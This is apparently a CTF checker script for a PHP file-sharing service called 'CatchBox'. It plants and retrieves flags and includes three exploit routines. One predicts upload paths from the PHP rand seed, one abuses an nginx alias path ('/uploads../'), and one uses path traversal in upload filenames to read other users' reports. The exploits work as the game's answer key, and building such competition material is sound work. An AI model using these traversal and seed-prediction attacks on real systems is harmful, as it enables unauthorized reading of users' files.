checker.py (9604B)
1from bs4 import BeautifulSoup 2 3from enochecker3 import ( 4 ChainDB, 5 DependencyInjector, 6 Enochecker, 7 ExploitCheckerTaskMessage, 8 GetflagCheckerTaskMessage, 9 GetnoiseCheckerTaskMessage, 10 InternalErrorException, 11 MumbleException, 12 PutflagCheckerTaskMessage, 13 PutnoiseCheckerTaskMessage, 14) 15from enochecker3.utils import FlagSearcher, assert_in, assert_equals 16 17import dateutil.parser 18 19from httpx import AsyncClient, Response 20 21from hashlib import md5 22 23from logging import LoggerAdapter 24 25from subprocess import Popen, PIPE 26 27import string 28 29from typing import Any, Optional 30 31import random 32 33import os 34 35checker = Enochecker("CatchBox", 9090) 36app = lambda: checker.app 37 38random.seed(int.from_bytes(os.urandom(16), "little")) 39 40noise_alph = string.ascii_letters + string.digits 41def noise(nmin: int, nmax: int) -> str: 42 n = random.randint(nmin, nmax) 43 return "".join(random.choice(noise_alph) for _ in range(n)) 44 45def filehash(user: str, file: str, seed: int) -> str: 46 code = f"<?php srand({seed}); echo md5('{user}'.'{file}'.strval(rand())); ?>" 47 with Popen("php", stdin=PIPE, stdout=PIPE) as php: 48 return php.communicate(code.encode())[0].strip().decode() 49 50def str2epoch(text: str) -> int: 51 date = dateutil.parser.parse(text + " UTC") 52 return int(date.timestamp()) 53 54def parse_html(logger: LoggerAdapter, r: Response) -> BeautifulSoup: 55 try: 56 return BeautifulSoup(r.text, "html.parser") 57 except: 58 logger.error(f"Invalid html from {r.request.method} {r.request.url.path}\n" \ 59 + r.text) 60 raise MumbleException(f"Invalid html ({r.request.method} {r.request.url.path})") 61 62def assert_status_code(logger: LoggerAdapter, r: Response, 63 code: int, errmsg: Optional[str], extra: Any = "") -> None: 64 if r.status_code != code: 65 logger.error(f"Bad service response for " \ 66 + f"{r.request.method} {r.request.url.path}:\n" \ 67 + f"Extra info: {str(extra)}\n{r.text}") 68 if errmsg is None: 69 errmsg = f"{r.request.method} {r.request.url.path} failed" 70 raise MumbleException(errmsg) 71 72@checker.putflag(0) 73async def putflag_file(task: PutflagCheckerTaskMessage, logger: LoggerAdapter, 74 client: AsyncClient, db: ChainDB) -> str: 75 username, password = noise(10, 20), noise(20, 30) 76 data = { "action": "register", "username": username, "password": password } 77 r = await client.post("/index.php", data=data) 78 assert_status_code(logger, r, 200, "Register failed", extra=data) 79 80 filename, content = noise(20, 30), task.flag 81 data = { "action": "upload", "filename": filename, "content": content } 82 r = await client.post("/index.php", data=data) 83 assert_status_code(logger, r, 200, "File upload", extra=data) 84 85 await db.set("info", (username, password, filename)) 86 87 return f"User {username} File {filename}" 88 89@checker.getflag(0) 90async def getflag_file(task: GetflagCheckerTaskMessage, 91 logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> None: 92 try: 93 username, password, filename = await db.get("info") 94 except KeyError: 95 raise MumbleException("database info missing") 96 97 data = { "action": "login", "username": username, "password": password } 98 r = await client.post("/index.php", data=data) 99 assert_status_code(logger, r, 200, "Login failed", extra=data) 100 101 r = await client.get(f"/index.php?f={filename}") 102 assert_status_code(logger, r, 200, "File download failed", extra=filename) 103 104 assert_in(task.flag, r.text, "Flag missing") 105 106@checker.putflag(1) 107async def putflag_report(task: PutflagCheckerTaskMessage, 108 logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> str: 109 username, password = noise(10, 20), noise(20, 30) 110 data = { "action": "register", "username": username, "password": password } 111 r = await client.post("/index.php", data=data) 112 assert_status_code(logger, r, 200, "Register failed", extra=data) 113 114 data = { "action": "report", "content": task.flag } 115 r = await client.post("/index.php", data=data) 116 assert_status_code(logger, r, 200, "Upload failed", extra=data) 117 118 await db.set("info", (username, password)) 119 120 return f"User {username} Report" 121 122@checker.getflag(1) 123async def getflag_report(task: GetflagCheckerTaskMessage, 124 logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> None: 125 try: 126 username, password = await db.get("info") 127 except KeyError: 128 raise MumbleException("Database info missing") 129 130 data = { "action": "login", "username": username, "password": password } 131 r = await client.post("/index.php", data=data) 132 assert_status_code(logger, r, 200, "Login failed", extra=data) 133 134 r = await client.get(f"/index.php?r") 135 assert_status_code(logger, r, 200, "Report download failed") 136 137 assert_in(task.flag, r.text, "Flag missing") 138 139@checker.putnoise(0) 140async def putnoise_file(task: PutnoiseCheckerTaskMessage, 141 logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> None: 142 username, password = noise(10, 20), noise(20, 30) 143 data = { "action": "register", "username": username, "password": password } 144 r = await client.post("/index.php", data=data) 145 assert_status_code(logger, r, 200, "Register failed", extra=data) 146 147 filename, content = noise(20, 30), noise(20, 30) 148 data = { "action": "upload", "filename": filename, "content": content } 149 r = await client.post("/index.php", data=data) 150 assert_status_code(logger, r, 200, "File upload failed", extra=data) 151 152 await db.set("info", (username, password, filename, content)) 153 154@checker.getnoise(0) 155async def getnoise_file(task: GetnoiseCheckerTaskMessage, 156 logger: LoggerAdapter, client: AsyncClient, 157 db: ChainDB, di: DependencyInjector) -> None: 158 try: 159 username, password, filename, noise = await db.get("info") 160 except KeyError: 161 raise MumbleException("database info missing") 162 163 data = { "action": "login", "username": username, "password": password } 164 r = await client.post("/index.php", data=data) 165 assert_status_code(logger, r, 200, "Login failed", extra=data) 166 167 r = await client.get("/index.php?q=files") 168 assert_status_code(logger, r, 200, "Files query failed") 169 170 soup = parse_html(logger, r) 171 files = [v.select("a") for v in soup.select("ul.filelist > li")] 172 assert_equals(all([len(v) == 2 for v in files]), True, "noise missing") 173 174 urls = { a.text.strip(): b.get("href", None) for a,b in files } 175 assert_in(filename, urls, "Noise missing") 176 assert_equals(type(urls[filename]), str, "noise missing") 177 178 r = await client.get(f"/index.php?f={filename}") 179 assert_status_code(logger, r, 200, "File download failed", extra=filename) 180 assert_in(noise, r.text, "Noise missing") 181 182 anon = await di.get(AsyncClient) 183 r = await anon.get(urls[filename]) 184 assert_status_code(logger, r, 200, "Public url invalid", 185 extra={"filename": filename, "url": urls[filename]}) 186 assert_in(noise, r.text, "Noise missing") 187 188@checker.exploit(0) 189async def exploit_file_creat(task: ExploitCheckerTaskMessage, 190 logger: LoggerAdapter, searcher: FlagSearcher, 191 client: AsyncClient) -> Optional[str]: 192 assert_equals(type(task.attack_info), str, "attack info missing") 193 194 assert_equals(len(task.attack_info.split()), 4) 195 _, flaguser, _, flagfile = task.attack_info.split() 196 197 r = await client.get("/?q=users") 198 assert_status_code(logger, r, 200, "Users listing failed") 199 200 soup = parse_html(logger, r) 201 users = [v.children for v in soup.select("ul.userlist > li")] 202 times = { a.text.strip(): str2epoch(b.text.strip()) for a,b in users } 203 204 assert_in(flaguser, times, "Flag user missing") 205 for creat in range(times[flaguser], times[flaguser] + 15): 206 dirname = filehash(flaguser, flagfile, creat) 207 r = await client.get(f"/uploads/{dirname}/{flagfile}") 208 if flag := searcher.search_flag(r.text): 209 return flag 210 211@checker.exploit(1) 212async def exploit_report_nginx(task: ExploitCheckerTaskMessage, 213 logger: LoggerAdapter, searcher: FlagSearcher, 214 client: AsyncClient) -> Optional[str]: 215 assert_equals(type(task.attack_info), str, "attack info missing") 216 assert_equals(len(task.attack_info.split()), 3, "attack info invalid") 217 218 _, flaguser, _ = task.attack_info.split() 219 reportfile = md5(flaguser.encode()).hexdigest() 220 221 r = await client.get(f"/uploads../reports/{reportfile}") 222 if flag := searcher.search_flag(r.text): 223 return flag 224 225@checker.exploit(2) 226async def exploit_report_path(task: ExploitCheckerTaskMessage, 227 logger: LoggerAdapter, searcher: FlagSearcher, 228 client: AsyncClient) -> Optional[str]: 229 assert_equals(type(task.attack_info), str, "attack info missing") 230 assert_equals(len(task.attack_info.split()), 3, "attack info invalid") 231 232 _, flaguser, _ = task.attack_info.split() 233 reportfile = md5(flaguser.encode()).hexdigest() 234 235 username, password = noise(10, 20), noise(20, 30) 236 data = { "action": "register", "username": username, "password": password } 237 r = await client.post("/index.php", data=data) 238 assert_status_code(logger, r, 200, "Register failed", extra=data) 239 240 filepath = f"../../reports/{reportfile}" 241 data = { "action": "upload", "filename": filepath, "content": "exploit2!" } 242 r = await client.post("/index.php", data=data) 243 assert_status_code(logger, r, 200, "Path traversal", extra=data) 244 245 r = await client.get(f"/index.php?f={filepath}") 246 if flag := searcher.search_flag(r.text): 247 return flag 248 249if __name__ == "__main__": 250 checker.run() 251